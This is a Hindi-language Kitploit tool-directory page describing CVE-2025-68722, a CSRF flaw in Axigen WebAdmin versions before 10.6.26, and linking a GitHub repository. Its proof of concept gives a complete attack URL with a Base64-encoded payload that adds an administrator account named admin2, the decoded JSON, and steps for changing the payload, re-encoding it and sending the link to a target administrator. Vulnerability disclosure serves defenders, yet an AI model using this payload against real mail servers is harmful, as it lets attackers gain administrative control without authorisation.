Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/osmancanvural/cve-2025-68722
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षा
GitHubosmancanvural/cve-2025-68722

CVE-2025-68722

Axigen WebAdmin CSRF भेद्यता

रिपॉजिटरी देखें
17 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-68722: Axigen WebAdmin CSRF

भेद्यता सारांश

Axigen WebAdmin इंटरफ़ेस में महत्वपूर्ण स्थिति-परिवर्तन करने वाली क्रियाएं GET अनुरोधों के माध्यम से सुलभ हैं। जबकि _h टोकन प्रत्यक्ष CSRF से बचाता है, एप्लिकेशन उपयोगकर्ता के प्रमाणीकरण के तुरंत बाद _s (ब्रेडक्रंब) पैरामीटर के माध्यम से कतारबद्ध अनुरोधों को संसाधित करता है।

एक हमलावर _s पैरामीटर में Base64-एन्कोडेड पेलोड वाला एक URL बना सकता है। यदि कोई प्रशासक इस लिंक पर क्लिक करता है और लॉगिन प्रक्रिया पूरी करता है, तो कतारबद्ध क्रिया स्वचालित रूप से उसके संदर्भ में निष्पादित हो जाती है।

प्रभावित संस्करण: < 10.6.26

अधिक जानकारी के लिए, Axigen Knowledge Base देखें।


POC

लक्ष्य URL: https://{axigen-domain}:9443/?_h=invalid&_s=eyJwYWdlIjoiYXVzciIsInBhcmFtcyI6eyJhY3Rpb24iOiJhZGQiLCAidXNlcm5hbWVfaW5wdXQiOiJhZG1pbjIiLCAicGFzc3dvcmRfaW5wdXQiOiJhZG1pbjIiLCAiZGlzcGxheV9uYW1lX2lucHV0IjoiYWRtaW4yIn19

डिकोड किया गया पेलोड (_s पैरामीटर):

root@kitploit:~
{"page":"ausr","params":{"action":"add", "username_input":"admin2", "password_input":"admin2", "display_name_input":"admin2"}}

पुनरुत्पादन के चरण:

  1. संशोधित करें: विभिन्न प्रशासनिक क्रियाओं (जैसे, सर्वर सेटिंग्स बदलना) को लक्षित करने के लिए JSON पेलोड बदलें।
  2. एन्कोड करें: संशोधित JSON को Base64 में पुनः एन्कोड करें।
  3. वितरित करें: हमले के URL में _s पैरामीटर के मान को बदलें और इसे लक्ष्य प्रशासक को भेजें।
  4. ट्रिगर करें: इस लिंक के माध्यम से लॉग इन करने पर, admin2 खाता बन जाता है (या आपकी कस्टम क्रिया निष्पादित होती है)।

टूल डाउनलोड करें